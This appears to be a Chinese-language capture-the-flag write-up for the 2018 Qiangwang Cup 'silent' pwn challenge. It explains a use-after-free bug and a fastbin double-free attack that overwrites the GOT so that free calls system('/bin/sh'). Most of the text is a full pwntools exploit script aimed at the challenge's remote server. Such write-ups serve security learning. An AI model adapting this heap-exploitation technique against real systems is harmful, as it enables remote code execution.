2018強網杯-Writeupsilent
- 漏洞位置: del函數free掉堆塊后沒有清空指針造成了dangling_ptr。并且edit函數在使用時沒有檢查堆塊是否已經free。
- 利用思路:利用UAF構造fastbin attack。申請堆塊,釋放堆塊進入fastbin,edit釋放的堆塊,修改其中的fd到got表上去,再申請回來,修改got表。
Fastbin Attack 在malloc回來的時候會檢查size位,看這個堆塊是不是屬于該Fastbin中,不過只檢查低4字節,如果size位為61,那么檢查時61-6f都能通過。
my-exp
from pwn import *
local = 1
if local:
p = process('./silent')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
p = remote('39.107.32.132' , 10000)#nc 39.107.32.132 10000
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add(length , text):
p.sendline('1')
sleep(0.3)
p.sendline(str(length))
sleep(0.3)
p.sendline(text)
sleep(0.3)
def dele(num):
p.sendline('2')
sleep(0.3)
p.sendline(str(num))
sleep(0.3)
def edit(num , text):
p.sendline('3')
sleep(0.3)
p.sendline(str(num))
sleep(0.3)
p.sendline(text)
sleep(0.3)
p.sendline('')
def debug():
print pidof(p)[0]
raw_input()
elf = ELF('./silent')
p.recvuntil('==+RWBXtIRRV+.+IiYRBYBRRYYIRI;VitI;=;..........:::.::;::::...;;;:.')
fake_chunk = 0x601ffa
system_plt = 0x400730
success('fake_chunk => ' + hex(fake_chunk))
success('system_plt => ' + hex(system_plt))
add(0x50 , 'a' * 0x4f)#chunk 0 rabbish
add(0x50 , 'b' * 0x4f)#chunk 1 rabbish
add(0x50 , 'c' * 0x4f)
#debug()
dele(0)#fastbin->chunk0
dele(1)#fastbin->chunk1->chunk0
debug()
dele(0)#fastbin->chunk0->chunk1->chunk0
add(0x50 , p64(fake_chunk))#fastbin->chunk1->chunk0->0x601ffa fd
add(0x50 , '/bin/sh\x00')#fastbin->chunk0->0x601ffa rabbish
add(0x50 , 'c' * 0x4f)#fastbin->0x601ffa command(chunk1)
add(0x50 , 'A' * 0xe + p64(system_plt))#free=>system
dele(1)#free(chunk1)=>system('/bin/sh\x00')
#debug()
p.interactive()